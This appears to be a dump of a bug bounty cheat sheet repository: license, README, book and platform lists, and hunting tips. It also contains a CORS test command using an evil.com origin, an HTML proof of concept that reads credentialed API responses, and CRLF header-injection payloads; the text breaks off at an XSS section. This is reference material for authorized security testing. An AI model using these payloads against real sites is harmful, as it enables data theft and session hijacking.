├── CONTRIBUTING.md
├── LICENSE
├── README.md
└── cheatsheets
    ├── books.md
    ├── bugbountyplatforms.md
    ├── bugbountytips.md
    ├── content-injection.md
    ├── cors.md
    ├── crlf.md
    ├── crypto.md
    ├── csv-injection.md
    ├── lfi.md
    ├── open-redirect.md
    ├── practice-platforms.md
    ├── rce.md
    ├── recon.md
    ├── special-tools.md
    ├── sqli.md
    ├── ssrf.md
    ├── template-injection.md
    ├── xslt.md
    ├── xss.md
    └── xxe.md


/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # Contributing
 2 | 
 3 | We welcome contributions from the public.
 4 | 
 5 | ### Using the issue tracker 💡
 6 | 
 7 | The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)
 8 | 
 9 | ### Issues and labels 🏷
10 | 
11 | Our bug tracker utilizes several labels to help organize and identify issues.
12 | 
13 | ### Guidelines for bug reports 🐛
14 | 
15 | Use the GitHub issue search — check if the issue has already been reported.
16 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 | Attribution-ShareAlike 4.0 International
  2 | 
  3 | =======================================================================
  4 | 
  5 | Creative Commons Corporation ("Creative Commons") is not a law firm and
  6 | does not provide legal services or legal advice. Distribution of
  7 | Creative Commons public licenses does not create a lawyer-client or
  8 | other relationship. Creative Commons makes its licenses and related
  9 | information available on an "as-is" basis. Creative Commons gives no
 10 | warranties regarding its licenses, any material licensed under their
 11 | terms and conditions, or any related information. Creative Commons
 12 | disclaims all liability for damages resulting from their use to the
 13 | fullest extent possible.
 14 | 
 15 | Using Creative Commons Public Licenses
 16 | 
 17 | Creative Commons public licenses provide a standard set of terms and
 18 | conditions that creators and other rights holders may use to share
 19 | original works of authorship and other material subject to copyright
 20 | and certain other rights specified in the public license below. The
 21 | following considerations are for informational purposes only, are not
 22 | exhaustive, and do not form part of our licenses.
 23 | 
 24 |      Considerations for licensors: Our public licenses are
 25 |      intended for use by those authorized to give the public
 26 |      permission to use material in ways otherwise restricted by
 27 |      copyright and certain other rights. Our licenses are
 28 |      irrevocable. Licensors should read and understand the terms
 29 |      and conditions of the license they choose before applying it.
 30 |      Licensors should also secure all rights necessary before
 31 |      applying our licenses so that the public can reuse the
 32 |      material as expected. Licensors should clearly mark any
 33 |      material not subject to the license. This includes other CC-
 34 |      licensed material, or material used under an exception or
 35 |      limitation to copyright. More considerations for licensors:
 36 | 	wiki.creativecommons.org/Considerations_for_licensors
 37 | 
 38 |      Considerations for the public: By using one of our public
 39 |      licenses, a licensor grants the public permission to use the
 40 |      licensed material under specified terms and conditions. If
 41 |      the licensor's permission is not necessary for any reason--for
 42 |      example, because of any applicable exception or limitation to
 43 |      copyright--then that use is not regulated by the license. Our
 44 |      licenses grant only permissions under copyright and certain
 45 |      other rights that a licensor has authority to grant. Use of
 46 |      the licensed material may still be restricted for other
 47 |      reasons, including because others have copyright or other
 48 |      rights in the material. A licensor may make special requests,
 49 |      such as asking that all changes be marked or described.
 50 |      Although not required by our licenses, you are encouraged to
 51 |      respect those requests where reasonable. More_considerations
 52 |      for the public:
 53 | 	wiki.creativecommons.org/Considerations_for_licensees
 54 | 
 55 | =======================================================================
 56 | 
 57 | Creative Commons Attribution-ShareAlike 4.0 International Public
 58 | License
 59 | 
 60 | By exercising the Licensed Rights (defined below), You accept and agree
 61 | to be bound by the terms and conditions of this Creative Commons
 62 | Attribution-ShareAlike 4.0 International Public License ("Public
 63 | License"). To the extent this Public License may be interpreted as a
 64 | contract, You are granted the Licensed Rights in consideration of Your
 65 | acceptance of these terms and conditions, and the Licensor grants You
 66 | such rights in consideration of benefits the Licensor receives from
 67 | making the Licensed Material available under these terms and
 68 | conditions.
 69 | 
 70 | 
 71 | Section 1 -- Definitions.
 72 | 
 73 |   a. Adapted Material means material subject to Copyright and Similar
 74 |      Rights that is derived from or based upon the Licensed Material
 75 |      and in which the Licensed Material is translated, altered,
 76 |      arranged, transformed, or otherwise modified in a manner requiring
 77 |      permission under the Copyright and Similar Rights held by the
 78 |      Licensor. For purposes of this Public License, where the Licensed
 79 |      Material is a musical work, performance, or sound recording,
 80 |      Adapted Material is always produced where the Licensed Material is
 81 |      synched in timed relation with a moving image.
 82 | 
 83 |   b. Adapter's License means the license You apply to Your Copyright
 84 |      and Similar Rights in Your contributions to Adapted Material in
 85 |      accordance with the terms and conditions of this Public License.
 86 | 
 87 |   c. BY-SA Compatible License means a license listed at
 88 |      creativecommons.org/compatiblelicenses, approved by Creative
 89 |      Commons as essentially the equivalent of this Public License.
 90 | 
 91 |   d. Copyright and Similar Rights means copyright and/or similar rights
 92 |      closely related to copyright including, without limitation,
 93 |      performance, broadcast, sound recording, and Sui Generis Database
 94 |      Rights, without regard to how the rights are labeled or
 95 |      categorized. For purposes of this Public License, the rights
 96 |      specified in Section 2(b)(1)-(2) are not Copyright and Similar
 97 |      Rights.
 98 | 
 99 |   e. Effective Technological Measures means those measures that, in the
100 |      absence of proper authority, may not be circumvented under laws
101 |      fulfilling obligations under Article 11 of the WIPO Copyright
102 |      Treaty adopted on December 20, 1996, and/or similar international
103 |      agreements.
104 | 
105 |   f. Exceptions and Limitations means fair use, fair dealing, and/or
106 |      any other exception or limitation to Copyright and Similar Rights
107 |      that applies to Your use of the Licensed Material.
108 | 
109 |   g. License Elements means the license attributes listed in the name
110 |      of a Creative Commons Public License. The License Elements of this
111 |      Public License are Attribution and ShareAlike.
112 | 
113 |   h. Licensed Material means the artistic or literary work, database,
114 |      or other material to which the Licensor applied this Public
115 |      License.
116 | 
117 |   i. Licensed Rights means the rights granted to You subject to the
118 |      terms and conditions of this Public License, which are limited to
119 |      all Copyright and Similar Rights that apply to Your use of the
120 |      Licensed Material and that the Licensor has authority to license.
121 | 
122 |   j. Licensor means the individual(s) or entity(ies) granting rights
123 |      under this Public License.
124 | 
125 |   k. Share means to provide material to the public by any means or
126 |      process that requires permission under the Licensed Rights, such
127 |      as reproduction, public display, public performance, distribution,
128 |      dissemination, communication, or importation, and to make material
129 |      available to the public including in ways that members of the
130 |      public may access the material from a place and at a time
131 |      individually chosen by them.
132 | 
133 |   l. Sui Generis Database Rights means rights other than copyright
134 |      resulting from Directive 96/9/EC of the European Parliament and of
135 |      the Council of 11 March 1996 on the legal protection of databases,
136 |      as amended and/or succeeded, as well as other essentially
137 |      equivalent rights anywhere in the world.
138 | 
139 |   m. You means the individual or entity exercising the Licensed Rights
140 |      under this Public License. Your has a corresponding meaning.
141 | 
142 | 
143 | Section 2 -- Scope.
144 | 
145 |   a. License grant.
146 | 
147 |        1. Subject to the terms and conditions of this Public License,
148 |           the Licensor hereby grants You a worldwide, royalty-free,
149 |           non-sublicensable, non-exclusive, irrevocable license to
150 |           exercise the Licensed Rights in the Licensed Material to:
151 | 
152 |             a. reproduce and Share the Licensed Material, in whole or
153 |                in part; and
154 | 
155 |             b. produce, reproduce, and Share Adapted Material.
156 | 
157 |        2. Exceptions and Limitations. For the avoidance of doubt, where
158 |           Exceptions and Limitations apply to Your use, this Public
159 |           License does not apply, and You do not need to comply with
160 |           its terms and conditions.
161 | 
162 |        3. Term. The term of this Public License is specified in Section
163 |           6(a).
164 | 
165 |        4. Media and formats; technical modifications allowed. The
166 |           Licensor authorizes You to exercise the Licensed Rights in
167 |           all media and formats whether now known or hereafter created,
168 |           and to make technical modifications necessary to do so. The
169 |           Licensor waives and/or agrees not to assert any right or
170 |           authority to forbid You from making technical modifications
171 |           necessary to exercise the Licensed Rights, including
172 |           technical modifications necessary to circumvent Effective
173 |           Technological Measures. For purposes of this Public License,
174 |           simply making modifications authorized by this Section 2(a)
175 |           (4) never produces Adapted Material.
176 | 
177 |        5. Downstream recipients.
178 | 
179 |             a. Offer from the Licensor -- Licensed Material. Every
180 |                recipient of the Licensed Material automatically
181 |                receives an offer from the Licensor to exercise the
182 |                Licensed Rights under the terms and conditions of this
183 |                Public License.
184 | 
185 |             b. Additional offer from the Licensor -- Adapted Material.
186 |                Every recipient of Adapted Material from You
187 |                automatically receives an offer from the Licensor to
188 |                exercise the Licensed Rights in the Adapted Material
189 |                under the conditions of the Adapter's License You apply.
190 | 
191 |             c. No downstream restrictions. You may not offer or impose
192 |                any additional or different terms or conditions on, or
193 |                apply any Effective Technological Measures to, the
194 |                Licensed Material if doing so restricts exercise of the
195 |                Licensed Rights by any recipient of the Licensed
196 |                Material.
197 | 
198 |        6. No endorsement. Nothing in this Public License constitutes or
199 |           may be construed as permission to assert or imply that You
200 |           are, or that Your use of the Licensed Material is, connected
201 |           with, or sponsored, endorsed, or granted official status by,
202 |           the Licensor or others designated to receive attribution as
203 |           provided in Section 3(a)(1)(A)(i).
204 | 
205 |   b. Other rights.
206 | 
207 |        1. Moral rights, such as the right of integrity, are not
208 |           licensed under this Public License, nor are publicity,
209 |           privacy, and/or other similar personality rights; however, to
210 |           the extent possible, the Licensor waives and/or agrees not to
211 |           assert any such rights held by the Licensor to the limited
212 |           extent necessary to allow You to exercise the Licensed
213 |           Rights, but not otherwise.
214 | 
215 |        2. Patent and trademark rights are not licensed under this
216 |           Public License.
217 | 
218 |        3. To the extent possible, the Licensor waives any right to
219 |           collect royalties from You for the exercise of the Licensed
220 |           Rights, whether directly or through a collecting society
221 |           under any voluntary or waivable statutory or compulsory
222 |           licensing scheme. In all other cases the Licensor expressly
223 |           reserves any right to collect such royalties.
224 | 
225 | 
226 | Section 3 -- License Conditions.
227 | 
228 | Your exercise of the Licensed Rights is expressly made subject to the
229 | following conditions.
230 | 
231 |   a. Attribution.
232 | 
233 |        1. If You Share the Licensed Material (including in modified
234 |           form), You must:
235 | 
236 |             a. retain the following if it is supplied by the Licensor
237 |                with the Licensed Material:
238 | 
239 |                  i. identification of the creator(s) of the Licensed
240 |                     Material and any others designated to receive
241 |                     attribution, in any reasonable manner requested by
242 |                     the Licensor (including by pseudonym if
243 |                     designated);
244 | 
245 |                 ii. a copyright notice;
246 | 
247 |                iii. a notice that refers to this Public License;
248 | 
249 |                 iv. a notice that refers to the disclaimer of
250 |                     warranties;
251 | 
252 |                  v. a URI or hyperlink to the Licensed Material to the
253 |                     extent reasonably practicable;
254 | 
255 |             b. indicate if You modified the Licensed Material and
256 |                retain an indication of any previous modifications; and
257 | 
258 |             c. indicate the Licensed Material is licensed under this
259 |                Public License, and include the text of, or the URI or
260 |                hyperlink to, this Public License.
261 | 
262 |        2. You may satisfy the conditions in Section 3(a)(1) in any
263 |           reasonable manner based on the medium, means, and context in
264 |           which You Share the Licensed Material. For example, it may be
265 |           reasonable to satisfy the conditions by providing a URI or
266 |           hyperlink to a resource that includes the required
267 |           information.
268 | 
269 |        3. If requested by the Licensor, You must remove any of the
270 |           information required by Section 3(a)(1)(A) to the extent
271 |           reasonably practicable.
272 | 
273 |   b. ShareAlike.
274 | 
275 |      In addition to the conditions in Section 3(a), if You Share
276 |      Adapted Material You produce, the following conditions also apply.
277 | 
278 |        1. The Adapter's License You apply must be a Creative Commons
279 |           license with the same License Elements, this version or
280 |           later, or a BY-SA Compatible License.
281 | 
282 |        2. You must include the text of, or the URI or hyperlink to, the
283 |           Adapter's License You apply. You may satisfy this condition
284 |           in any reasonable manner based on the medium, means, and
285 |           context in which You Share Adapted Material.
286 | 
287 |        3. You may not offer or impose any additional or different terms
288 |           or conditions on, or apply any Effective Technological
289 |           Measures to, Adapted Material that restrict exercise of the
290 |           rights granted under the Adapter's License You apply.
291 | 
292 | 
293 | Section 4 -- Sui Generis Database Rights.
294 | 
295 | Where the Licensed Rights include Sui Generis Database Rights that
296 | apply to Your use of the Licensed Material:
297 | 
298 |   a. for the avoidance of doubt, Section 2(a)(1) grants You the right
299 |      to extract, reuse, reproduce, and Share all or a substantial
300 |      portion of the contents of the database;
301 | 
302 |   b. if You include all or a substantial portion of the database
303 |      contents in a database in which You have Sui Generis Database
304 |      Rights, then the database in which You have Sui Generis Database
305 |      Rights (but not its individual contents) is Adapted Material,
306 | 
307 |      including for purposes of Section 3(b); and
308 |   c. You must comply with the conditions in Section 3(a) if You Share
309 |      all or a substantial portion of the contents of the database.
310 | 
311 | For the avoidance of doubt, this Section 4 supplements and does not
312 | replace Your obligations under this Public License where the Licensed
313 | Rights include other Copyright and Similar Rights.
314 | 
315 | 
316 | Section 5 -- Disclaimer of Warranties and Limitation of Liability.
317 | 
318 |   a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
319 |      EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
320 |      AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
321 |      ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
322 |      IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
323 |      WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
324 |      PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
325 |      ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
326 |      KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
327 |      ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.
328 | 
329 |   b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
330 |      TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
331 |      NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
332 |      INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
333 |      COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
334 |      USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
335 |      ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
336 |      DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
337 |      IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.
338 | 
339 |   c. The disclaimer of warranties and limitation of liability provided
340 |      above shall be interpreted in a manner that, to the extent
341 |      possible, most closely approximates an absolute disclaimer and
342 |      waiver of all liability.
343 | 
344 | 
345 | Section 6 -- Term and Termination.
346 | 
347 |   a. This Public License applies for the term of the Copyright and
348 |      Similar Rights licensed here. However, if You fail to comply with
349 |      this Public License, then Your rights under this Public License
350 |      terminate automatically.
351 | 
352 |   b. Where Your right to use the Licensed Material has terminated under
353 |      Section 6(a), it reinstates:
354 | 
355 |        1. automatically as of the date the violation is cured, provided
356 |           it is cured within 30 days of Your discovery of the
357 |           violation; or
358 | 
359 |        2. upon express reinstatement by the Licensor.
360 | 
361 |      For the avoidance of doubt, this Section 6(b) does not affect any
362 |      right the Licensor may have to seek remedies for Your violations
363 |      of this Public License.
364 | 
365 |   c. For the avoidance of doubt, the Licensor may also offer the
366 |      Licensed Material under separate terms or conditions or stop
367 |      distributing the Licensed Material at any time; however, doing so
368 |      will not terminate this Public License.
369 | 
370 |   d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
371 |      License.
372 | 
373 | 
374 | Section 7 -- Other Terms and Conditions.
375 | 
376 |   a. The Licensor shall not be bound by any additional or different
377 |      terms or conditions communicated by You unless expressly agreed.
378 | 
379 |   b. Any arrangements, understandings, or agreements regarding the
380 |      Licensed Material not stated herein are separate from and
381 |      independent of the terms and conditions of this Public License.
382 | 
383 | 
384 | Section 8 -- Interpretation.
385 | 
386 |   a. For the avoidance of doubt, this Public License does not, and
387 |      shall not be interpreted to, reduce, limit, restrict, or impose
388 |      conditions on any use of the Licensed Material that could lawfully
389 |      be made without permission under this Public License.
390 | 
391 |   b. To the extent possible, if any provision of this Public License is
392 |      deemed unenforceable, it shall be automatically reformed to the
393 |      minimum extent necessary to make it enforceable. If the provision
394 |      cannot be reformed, it shall be severed from this Public License
395 |      without affecting the enforceability of the remaining terms and
396 |      conditions.
397 | 
398 |   c. No term or condition of this Public License will be waived and no
399 |      failure to comply consented to unless expressly agreed to by the
400 |      Licensor.
401 | 
402 |   d. Nothing in this Public License constitutes or may be interpreted
403 |      as a limitation upon, or waiver of, any privileges and immunities
404 |      that apply to the Licensor or You, including from the legal
405 |      processes of any jurisdiction or authority.
406 | 
407 | 
408 | =======================================================================
409 | 
410 | Creative Commons is not a party to its public
411 | licenses. Notwithstanding, Creative Commons may elect to apply one of
412 | its public licenses to material it publishes and in those instances
413 | will be considered the “Licensor.” The text of the Creative Commons
414 | public licenses is dedicated to the public domain under the CC0 Public
415 | Domain Dedication. Except for the limited purpose of indicating that
416 | material is shared under a Creative Commons public license or as
417 | otherwise permitted by the Creative Commons policies published at
418 | creativecommons.org/policies, Creative Commons does not authorize the
419 | use of the trademark "Creative Commons" or any other trademark or logo
420 | of Creative Commons without its prior written consent including,
421 | without limitation, in connection with any unauthorized modifications
422 | to any of its public licenses or any other arrangements,
423 | understandings, or agreements concerning use of licensed material. For
424 | the avoidance of doubt, this paragraph does not form part of the
425 | public licenses.
426 | 
427 | Creative Commons may be contacted at creativecommons.org.
428 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Bug Bounty Cheat Sheet</h1>
 2 | 
 3 | | 📚 Reference                                                | 🔎 Vulnerabilities                                        | 
 4 | |-------------------------------------------------------------|-----------------------------------------------------------| 
 5 | | [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md)   | [XSS](cheatsheets/xss.md)                               | 
 6 | | [Books](cheatsheets/books.md)                               | [SQLi](cheatsheets/sqli.md)                             | 
 7 | | [Special Tools](cheatsheets/special-tools.md)               | [SSRF](cheatsheets/ssrf.md)                             | 
 8 | | [Recon](cheatsheets/recon.md)                               | [CRLF Injection](cheatsheets/crlf.md)                   | 
 9 | | [Practice Platforms](cheatsheets/practice-platforms.md)     | [CSV Injection](cheatsheets/csv-injection.md)           | 
10 | | [Bug Bounty Tips](cheatsheets/bugbountytips.md)             | [LFI](cheatsheets/lfi.md)                               | 
11 | |                                                             | [XXE](cheatsheets/xxe.md)                               | 
12 | |                                                             | [RCE](cheatsheets/rce.md)                               | 
13 | |                                                             | [Open Redirect](cheatsheets/open-redirect.md)           | 
14 | |                                                             | [Crypto](cheatsheets/crypto.md)                         | 
15 | |                                                             | [Template Injection](cheatsheets/template-injection.md) | 
16 | |                                                             | [Content Injection](cheatsheets/content-injection.md)   | 
17 | |                                                             | [XSLT Injection](cheatsheets/xslt.md)                   | 
18 | 
19 | # Contributing
20 | 
21 | We welcome contributions from the public.
22 | 
23 | ### Using the issue tracker 💡
24 | 
25 | The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)
26 | 
27 | ### Issues and labels 🏷
28 | 
29 | Our bug tracker utilizes several labels to help organize and identify issues.
30 | 
31 | ### Guidelines for bug reports 🐛
32 | 
33 | Use the GitHub issue search — check if the issue has already been reported.
34 | 
35 | # Style Guide
36 | 
37 | We like to keep our Markdown files as uniform as possible. So if you submit a PR, make sure to follow this style guide (we will not be angry if you do not).
38 | 
39 | - Cheat sheet titles should start with `##`.
40 | - Subheadings should be made bold. (`**Subheading**`)
41 | - Add newlines after subheadings and code blocks.
42 | - Code blocks should use three backticks. (```)
43 | - Make sure to use syntax highlighting whenever possible.
44 | 
45 | # Contributors
46 | 
47 | - [EdOverflow](https://github.com/EdOverflow)
48 | - [GerbenJavado](https://github.com/GerbenJavado)
49 | - [jon_bottarini](https://github.com/BlueTower)
50 | - [sp1d3r](https://github.com/sp1d3r)
51 | - [yasinS](https://github.com/yasinS)
52 | - [neutrinoguy](https://github.com/neutrinoguy)
53 | - [kuromatae](https://github.com/kuromatae)
54 | - [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors)
55 | 


--------------------------------------------------------------------------------
/cheatsheets/books.md:
--------------------------------------------------------------------------------
 1 | ## Books
 2 | **Web and browser**
 3 | - [Web Hacking 101](https://leanpub.com/web-hacking-101) by Peter Yaworski.
 4 | - [Breaking into Information Security: Learning the Ropes 101](https://leanpub.com/ltr101-breaking-into-infosec) by Andy Gill.
 5 | - [The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/) by Dafydd Stuttard and Marcus Pinto.
 6 | - [Tangled Web](https://www.nostarch.com/tangledweb) by Michal Zalewski.
 7 | - [OWASP Testing Guide v4](https://www.owasp.org/images/1/19/OTGv4.pdf) by OWASP Breakers community.
 8 | 
 9 | **Mobile**
10 | - [The Mobile Application Hacker's Handbook](https://www.amazon.com/Mobile-Application-Hackers-Handbook/dp/1118958500) by Dominic Chell et al.
11 | - [iOS Application Security: The Definitive Guide for Hackers and Developers](https://www.nostarch.com/iossecurity) by David Thiel.
12 | 
13 | **Cryptography**
14 | - [Crypto 101](https://www.crypto101.io/) by Laurens Van Houtven.
15 | 
16 | **Penetration Testing**
17 | - [The Art of Exploitation by Jon Erickson, 2008](https://www.nostarch.com/hacking2.htm)
18 | - [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://www.nostarch.com/metasploit)
19 | - [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://www.nostarch.com/pentesting)
20 | - [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/)
21 | - [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/)
22 | - [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1)
23 | - [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4)
24 | - [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
25 | - [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6)
26 | - [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/)
27 | - [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
28 | - [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677)
29 | - [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE)
30 | - [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362)
31 | - [Bug Hunter's Diary by Tobias Klein, 2011](https://www.nostarch.com/bughunter)
32 | - [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)
33 | 


--------------------------------------------------------------------------------
/cheatsheets/bugbountyplatforms.md:
--------------------------------------------------------------------------------
 1 | ## Bug Bounty Platforms
 2 | 
 3 | **Open For Signup**
 4 | 
 5 | - [HackerOne](https://www.hackerone.com/)
 6 | - [Bugcrowd](https://www.bugcrowd.com/)
 7 | - [BountyFactory](https://bountyfactory.io/)
 8 | - [Intigriti](https://intigriti.be/)
 9 | - [Bugbountyjp](https://bugbounty.jp/)
10 | - [Safehats](https://safehats.com/)
11 | - [BugbountyHQ](https://www.bugbountyhq.com/)
12 | - [Hackerhive](https://hackerhive.io/)
13 | - [Hackenproof](https://hackenproof.com/)
14 | - [Hacktrophy](https://hacktrophy.com/)
15 | - [CESPPA](https://www.cesppa.com/)
16 | 
17 | **Invite based Platforms**
18 | 
19 | - [Synack](https://www.synack.com/red-team/)
20 | - [Cobalt](https://cobalt.io/)
21 | - [Zerocopter](https://zerocopter.com/)
22 | - [Yogosha](https://www.yogosha.com/)
23 | - [Bugbountyzone](https://bugbountyzone.com/)
24 | - [Antihack.me](http://www.antihack.me/)
25 | - [Vulnscope](https://www.vulnscope.com/)
26 | 


--------------------------------------------------------------------------------
/cheatsheets/bugbountytips.md:
--------------------------------------------------------------------------------
 1 | ## Bug Bounty Tips
 2 | 
 3 | **Tip #1**
 4 | 
 5 | Use GIT as a recon tool. Find the target's GIT repositories, clone them, and then check the logs for information on the team not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.
 6 | 
 7 | [Link](https://gist.github.com/EdOverflow/a9aad69a690d97a8da20cd4194ca6596 )
 8 | 
 9 | **Tip #2**
10 | 
11 | Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to `/explore`. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.
12 | 
13 | **Tip #3**
14 | 
15 | 
16 | Bug bounty tip: test applications of a company that costs money or requires manual setup. Chances are only few to none would have tested it leaving it vulnerable. 
17 | 
18 | **Tip #4**
19 | 
20 | If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO.
21 | 
22 | 
23 | **Tip #5**
24 | 
25 | Look for *hackathon-related* assets. What I mean by this is sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. I have found GIT instances that were set up for Hackathons full of information that allowed me to find more issues in the target several times.
26 | 
27 | 
28 | 
29 | **Tip #6**
30 | 
31 | Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/
32 | 
33 | 
34 | 
35 | **Tip #7**
36 | 
37 | When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score.
38 | For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim.
39 | 


--------------------------------------------------------------------------------
/cheatsheets/content-injection.md:
--------------------------------------------------------------------------------
1 | ## Content Injection
2 | 
3 | ```
4 | ❤ bounty pls
5 | ```


--------------------------------------------------------------------------------
/cheatsheets/cors.md:
--------------------------------------------------------------------------------
 1 | ## Cross Origin Resource Sharing (CORS)
 2 | 
 3 | Testing:
 4 | `curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'`
 5 | 
 6 | Check to see what the server responds with in the `Access-Control-Allow-Origin:` (if anything) and if so, check if `Access-Control-Allow-Credentials: true` is present.
 7 | 
 8 | If it is trusting arbitrary origins **with** allow-credentials set to true, then host this HTML as a proof of concept.
 9 | 
10 | ```
11 | <!DOCTYPE html>
12 | <html>
13 | <head><title>BugBounty CheatSheet</title></head>
14 | <body>
15 | <center>
16 | <h2>CORs POC</h2>
17 | 
18 | <textarea rows="10" cols="60" id="pwnz">
19 | </textarea><br>
20 | <button type="button" onclick="cors()">Exploit</button>
21 | </div>
22 | 
23 | <script>
24 | function cors() {
25 |   var xhttp = new XMLHttpRequest();
26 |   xhttp.onreadystatechange = function() {
27 |     if (this.readyState == 4 && this.status == 200) {
28 |       document.getElementById("pwnz").innerHTML = this.responseText;
29 |     }
30 |   };
31 |   xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
32 |   xhttp.withCredentials = true;
33 |   xhttp.send();
34 | }
35 | </script>
36 | ```
37 | 


--------------------------------------------------------------------------------
/cheatsheets/crlf.md:
--------------------------------------------------------------------------------
 1 | ## CRLF Injection || HTTP Response Splitting
 2 | 
 3 | ```
 4 | %0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
 5 | ```
 6 | 
 7 | **Header-based test, site root**
 8 | 
 9 | ```
10 | %0d%0aheader:header
11 | ```
12 | ```
13 | %0aheader:header
14 | ```
15 | ```
16 | %0dheader:header
17 | ```
18 | ```
19 | %23%0dheader:header
20 | ```
21 | ```
22 | %3f%0dheader:header
23 | ```
24 | 
25 | ```
26 | /%250aheader:header
27 | ```
28 | 
29 | ```
30 | /%25250aheader:header
31 | ```
32 | 
33 | ```
34 | /%%0a0aheader:header
35 | ```
36 | 
37 | ```
38 | /%3f%0dheader:header
39 | ```
40 | 
41 | ```
42 | /%23%0dheader:header
43 | ```
44 | 
45 | ```
46 | /%25%30aheader:header
47 | ```
48 | 
49 | ```
50 | /%25%30%61header:header
51 | ```
52 | 
53 | ```
54 | /%u000aheader:header
55 | ```
56 | 
57 | **CRLF chained with Open Redirect server misconfiguration**
58 | 
59 | _Note:_ This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)
60 | 
61 | ```
62 | //www.google.com/%2f%2e%2e%0d%0aheader:header
63 | ```
64 | ```
65 | /www.google.com/%2e%2e%2f%0d%0aheader:header
66 | ```
67 | ```
68 | /google.com/%2F..%0d%0aheader:header
69 | ```
70 | 
71 | **Twitter specific CRLF** by [@filedescriptor](http://blog.innerht.ml/twitter-crlf-injection/)
72 | 
73 | ```
74 | %E5%98%8A%E5%98%8Dheader:header
75 | ```
76 | 
77 | **CRLF Injection to XSS**
78 | 
79 | ```
